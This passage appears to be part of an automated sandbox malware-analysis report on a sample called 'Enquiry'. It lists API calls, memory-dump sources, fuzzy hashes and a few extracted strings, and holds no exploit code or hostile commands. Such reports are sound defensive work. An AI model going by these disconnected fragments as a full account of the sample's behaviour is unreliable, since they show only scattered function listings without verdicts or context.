                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                            • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                            • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                            • GetParent.USER32 ref: 00469C98
                            • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                            • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                            • GetParent.USER32 ref: 00469CBC
                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: MessageSend$CtrlParent$_memmove_wcslen
                            • String ID: ComboBox$ListBox
                            • API String ID: 2360848162-1403004172
                            • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                            • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                            • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                            • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                            • String ID:
                            • API String ID: 262282135-0
                            • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                            • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                            • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                            • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                            APIs
                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                            • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                            • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                            • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                            • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                            • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                            • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: MessageSend$LongWindow
                            • String ID:
                            • API String ID: 312131281-0
                            • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                            • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                            • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                            • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                            APIs
                              • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                            • SendMessageW.USER32(75C123D0,00001001,00000000,?), ref: 00448E16
                            • SendMessageW.USER32(75C123D0,00001026,00000000,?), ref: 00448E25
                              • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: MessageSend$BrushCreateDeleteObjectSolid
                            • String ID:
                            • API String ID: 3771399671-0
                            • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                            • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                            • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                            • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                            APIs
                            • GetCurrentThreadId.KERNEL32 ref: 00434643
                            • GetForegroundWindow.USER32(00000000), ref: 00434655
                            • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                            • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                            • String ID:
                            • API String ID: 2156557900-0
                            • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                            • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                            • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                            • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID:
                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                            • API String ID: 0-1603158881
                            • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                            • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                            • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                            • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                            APIs
                            • CreateMenu.USER32 ref: 00448603
                            • SetMenu.USER32(?,00000000), ref: 00448613
                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                            • IsMenu.USER32(?), ref: 004486AB
                            • CreatePopupMenu.USER32 ref: 004486B5
                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                            • DrawMenuBar.USER32 ref: 004486F5
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Menu$CreateItem$DrawInfoInsertPopup
                            • String ID: 0
                            • API String ID: 161812096-4108050209
                            • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                            • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                            • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                            • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                            • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                            • Opcode Fuzzy Hash: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                            • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                            APIs
                              • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                              • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                            • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                            • MoveFileW.KERNEL32(?,?), ref: 00453932
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: File$AttributesFullMoveNamePathlstrcmpi
                            • String ID:
                            • API String ID: 978794511-0
                            • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                            • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                            • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                            • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                            • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                            • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                            • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: ClearVariant
                            • String ID:
                            • API String ID: 1473721057-0
                            • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                            • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                            • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                            • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: _memmove$_memcmp
                            • String ID: '$\$h
                            • API String ID: 2205784470-1303700344
                            • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                            • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                            • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                            • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                            APIs
                            • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                            • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                            • VariantClear.OLEAUT32 ref: 0045EA6D
                            • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                            • __swprintf.LIBCMT ref: 0045EC33
                            • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                            Strings
                            • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Variant$InitTime$ClearCopySystem__swprintf
                            • String ID: %4d%02d%02d%02d%02d%02d
                            • API String ID: 2441338619-1568723262
                            • Opcode ID: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                            • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                            • Opcode Fuzzy Hash: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                            • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                            APIs
                            • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                            • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                            • Sleep.KERNEL32(0000000A), ref: 0042C67F
                            • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                            • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Interlocked$DecrementIncrement$Sleep
                            • String ID: @COM_EVENTOBJ
                            • API String ID: 327565842-2228938565
                            • Opcode ID: 7a6a6944b375bdcf2396f9f34e6abe7c386284c5530abc4d8420471013998a44
                            • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                            • Opcode Fuzzy Hash: 7a6a6944b375bdcf2396f9f34e6abe7c386284c5530abc4d8420471013998a44
                            • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                            APIs
                            • VariantClear.OLEAUT32(?), ref: 0047031B
                            • VariantClear.OLEAUT32(?), ref: 0047044F
                            • VariantInit.OLEAUT32(?), ref: 004704A3
                            • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                            • VariantClear.OLEAUT32(?), ref: 00470516
                              • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                            • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                              • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                            • VariantClear.OLEAUT32(00000000), ref: 0047060D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Variant$Clear$Copy$CallDispFuncInit
                            • String ID: H
                            • API String ID: 3613100350-2852464175
                            • Opcode ID: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                            • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                            • Opcode Fuzzy Hash: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                            • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                            APIs
                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                            • DestroyWindow.USER32(?), ref: 00426F50
                            • UnregisterHotKey.USER32(?), ref: 00426F77
                            • FreeLibrary.KERNEL32(?), ref: 0042701F
                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                            • String ID: close all
                            • API String ID: 4174999648-3243417748
